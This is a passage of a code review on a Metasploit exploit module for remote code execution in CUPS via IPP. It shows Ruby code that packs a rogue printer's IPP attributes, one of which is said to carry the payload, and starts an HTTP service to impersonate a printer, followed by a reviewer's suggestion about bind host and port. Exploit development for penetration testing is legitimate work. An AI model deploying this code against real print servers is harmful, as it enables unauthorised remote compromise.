modules/exploits/multi/misc/cups_ipp_remote_code_execution.rb

```diff
@@ -0,0 +1,607 @@
+    attributes[[SectionEnum::PRINTER, 'printer-info', TagEnum::TEXT_WITHOUT_LANGUAGE]] = ['Printer']
+
+    # textWithoutLanguage
+    attributes[[SectionEnum::PRINTER, 'printer-make-and-model', TagEnum::TEXT_WITHOUT_LANGUAGE]] = ['Printer 1.00']
+
+    # nameWithoutLanguage
+    attributes[[SectionEnum::PRINTER, 'printer-name', TagEnum::NAME_WITHOUT_LANGUAGE]] = ['Printer']
+
+    # enum
+    attributes[[SectionEnum::PRINTER, 'printer-state', TagEnum::ENUM]] = [JobStateEnum::PENDING] # AKA IDLE
+
+    # keyword
+    attributes[[SectionEnum::PRINTER, 'printer-state-reasons', TagEnum::KEYWORD]] = ['none']
+
+    # integer
+    attributes[[SectionEnum::PRINTER, 'pdl-override-supported', TagEnum::INTEGER]] = [Time.now.to_i]
+
+    # uri
+    attributes[[SectionEnum::PRINTER, 'printer-uri-supported', TagEnum::URI]] = ['ipp://localhost:631/printer']
+
+    # keyword
+    attributes[[SectionEnum::PRINTER, 'uri-authentication-supported', TagEnum::KEYWORD]] = ['none']
+
+    # keyword
+    attributes[[SectionEnum::PRINTER, 'uri-security-supported', TagEnum::KEYWORD]] = ['none']
+
+    # Create response, imitating ipp-server's 'to_file' function
+
+    # Pack the version
+    response = [version_major, version_minor].pack('C*')
+
+    # Pack the 2-byte status code
+    response << [0x0000].pack('n')
+
+    # Pack the 4-byte request ID
+    response << [request_id].pack('N')
+
+    # Group the above defined attributes by section (we use the PRINTER section for the payload)
+    attributes.group_by { |k, _v| k[0] }.each do |section, attrs_in_section|
+      response << [section].pack('C')
+
+      attrs_in_section.each do |key, values|
+        _section, name, tag = key
+        values.each_with_index do |value, i|
+          response << [tag].pack('C')
+          if i == 0
+            response << [name.length].pack('n')
+            response << name
+          else
+            response << [0].pack('n')
+          end
+
+          # Make sure non-string values work by packing as four bytes (should work for all ints)
+          if value.is_a?(Integer)
+            response << [4].pack('n')
+            response << [value].pack('N')
+          else
+            # Packing strings
+            response << [value.length].pack('n')
+            response << value
+          end
+        end
+      end
+    end
+
+    # Close out attributes with an ENDTAG
+    response << [SectionEnum::ENDTAG].pack('C')
+
+    response
+  end
+
+  #
+  # IPP servers communicate using a binary protocol via HTTP
+  #
+  def start_ipp_service
+    comm = _determine_server_comm(datastore['SRVHOST'])
+
+    # If the IPP web service is still present from a previous run, initialize state
+    if service2
+      service2.remove_resource('/ipp/print')
+      service2.stop
+      self.service2 = nil
+    end
+
+    # Start the IPP web service
+    self.service2 = Rex::ServiceManager.start(
+      Rex::Proto::Http::Server,
+      datastore['SRVPORT'],
+      datastore['SRVHOST'],
```

Comment:
Should probably use the methods so the host is consistent with the DNS server.
```suggestion
      bindport,
      bindhost,
```